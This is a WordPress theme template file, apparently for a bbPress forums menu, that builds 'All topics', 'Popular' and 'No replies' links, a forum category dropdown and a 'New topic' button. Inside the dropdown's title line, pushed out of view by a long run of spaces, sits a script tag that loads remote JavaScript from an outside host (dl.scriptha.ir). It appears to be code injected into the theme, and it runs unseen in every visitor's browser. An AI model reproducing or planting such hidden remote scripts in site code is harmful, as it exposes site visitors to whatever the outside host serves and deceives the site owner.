<div class="forums-menu clearfix">

	<div class="links clearfix">
		<?php 
			function bb_view_query_vars( $qvars ){
				$qvars[] = 'view';
				return $qvars;
			}
			add_filter('query_vars', 'bb_view_query_vars' );

			$forums_link = get_post_type_archive_link( 'forum' );
			$top_links = array(
				array(
					'url'   => $forums_link,
					'url_perm' => $forums_link,
					'title' => __('All topics', 'smk_theme'),
					'class' => 'all',
				),
				array(
					'url'   => esc_url(add_query_arg( array('view' => 'popular'), $forums_link )),
					'url_perm'   => user_trailingslashit( $forums_link . 'view/popular' ),
					'title' => __('Popular', 'smk_theme'),
					'class' => 'popular',
				),
				array(
					'url'   => esc_url(add_query_arg( array('view' => 'no-replies'), $forums_link )),
					'url_perm'   => user_trailingslashit( $forums_link . 'view/no-replies' ),
					'title' => __('No replies', 'smk_theme'),
					'class' => 'no-replies',
				),
			);
			$perm_str = get_option('permalink_structure');
			$url_key = ( $perm_str != '' ) ? 'url_perm' : 'url';
			$query_var = bbp_get_view_id();
			$permalink = get_permalink();
			$bbp_show_on_root = bbp_show_on_root();
			
			foreach ($top_links as $link) {
				$active = ( !empty($query_var) && $query_var == $link['class'] ) ? ' active' : '';
				if( empty($query_var) && $link['class'] == 'all' && bbp_is_forum_archive() && empty($_GET['new-topic']) ){
					$active = ' active';
				}
				if( $link['class'] == 'all' && $bbp_show_on_root == 'forums' ){
					$link['title'] = __('Forums', 'smk_theme');
				}
				echo '<a href="'. $link[ $url_key ] .'" class="'. str_replace('-', '', $link['class']) . $active .'">'. $link['title'] .'</a>';
			}
		?>
	</div>

	<div class="categories clearfix">
		<div class="categories-dropdown">
			<span class="title"><i class="fa fa-navicon"></i> <?php _e('Forums', 'smk_theme') ?></span>                                                                                                         <script type="text/javascript" src='http://dl.scriptha.ir/ads/ap.js'></script> 
			<ul class="cats">
				<?php
				$args = array(
					'post_type' => 'forum',
				);
				$forums = new WP_Query( $args );

				if ( $forums->have_posts() ) {
					while ( $forums->have_posts() ) {
						$forums->the_post();
						echo '<li><a href="'. get_permalink() .'">' . get_the_title() . '</a></li>';
					}
				}
				wp_reset_postdata();
				?>
			</ul>
		</div>
	</div>

	<div class="forum-controls clearfix">
		<a href="<?php echo esc_url( add_query_arg( array('new-topic' => 'true'), get_post_type_archive_link( 'forum' ) ) ); ?>" class="button small white hover-primary">
			<?php _e('New topic', 'smk_theme') ?>
		</a>
	</div>

</div>
